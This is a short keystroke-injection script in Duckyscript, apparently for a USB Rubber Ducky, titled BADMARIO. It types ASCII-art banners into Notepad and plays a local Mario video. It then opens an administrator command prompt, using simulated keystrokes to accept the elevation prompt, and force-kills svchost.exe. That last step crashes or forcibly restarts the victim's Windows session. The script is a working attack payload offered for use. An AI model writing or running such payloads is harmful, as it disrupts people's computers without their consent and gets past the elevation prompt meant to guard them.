REM BADMARIO
REM Made By Blas1ed
GUI r
DELAY 300
STRING notepad
ENTER
DELAY 500
STRING   __  __      _      ____  U _____ u       ____   __   __       ____     _         _      ____       _  U _____ u ____    
ENTER
HOME
STRING U|' \/ '|uU  /"\  u |  _"\ \| ___"|/    U | __")u \ \ / /    U | __")u  |"|    U  /"\  u / __"| u   /"| \| ___"|/|  _"\   
ENTER
HOME
STRING \| |\/| |/ \/ _ \/ /| | | | |  _|"       \|  _ \/  \ V /      \|  _ \/U | | u   \/ _ \/ <\___ \/  u | |u |  _|" /| | | |  
ENTER
HOME
STRING  | |  | |  / ___ \ U| |_| |\| |___        | |_) | U_|"|_u      | |_) | \| |/__  / ___ \  u___) |   \| |/ | |___ U| |_| |\
ENTER
HOME
STRING  |_|  |_| /_/   \_\ |____/ u|_____|       |____/    |_|        |____/   |_____|/_/   \_\ |____/>>   |_|  |_____| |____/ u
ENTER
HOME
STRING <<,-,,-.   \\    >>  |||_   <<   >>      _|| \\_.-,//|(_      _|| \\_   //  \\  \\    >>  )(  (__)_//<,-,<<   >>  |||_    
ENTER
HOME
STRING   (./  \.) (__)  (__)(__)_) (__) (__)    (__) (__)\_) (__)    (__) (__) (_")("_)(__)  (__)(__)    (__)(_/(__) (__)(__)_)   
ENTER
HOME
STRING    ____      _      ____    __  __      _       ____               U  ___ u 
ENTER
HOME
STRING U | __")uU  /"\  u |  _"\ U|' \/ '|uU  /"\  uU |  _"\ u     ___     \/"_ \/ 
ENTER
HOME
STRING  \|  _ \/ \/ _ \/ /| | | |\| |\/| |/ \/ _ \/  \| |_) |/    |_"_|    | | | | 
ENTER
HOME
STRING   | |_) | / ___ \ U| |_| |\| |  | |  / ___ \   |  _ <       | | .-,_| |_| | 
ENTER
HOME
STRING   |____/ /_/   \_\ |____/ u|_|  |_| /_/   \_\  |_| \_\    U/| |\u\_)-\___/  
ENTER
HOME
STRING  _|| \\_  \\    >>  |||_  <<,-,,-.   \\    >>  //   \\_.-,_|___|_,-.  \\    
ENTER
HOME
STRING (__) (__)(__)  (__)(__)_)  (./  \.) (__)  (__)(__)  (__)\_)-' '-(_/  (__)   
DELAY 1500
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 500
STRING C:\Users\jacob\Downloads\Mario.mp4
ENTER
DELAY 7500
GUI r
DELAY 300
STRING cmd
CTRL-SHIFT ENTER
DELAY 850
SHIFT TAB
DELAY 300
ENTER
DELAY 700
STRING TASKKILL /IM svchost.exe /F
DELAY 300
ENTER

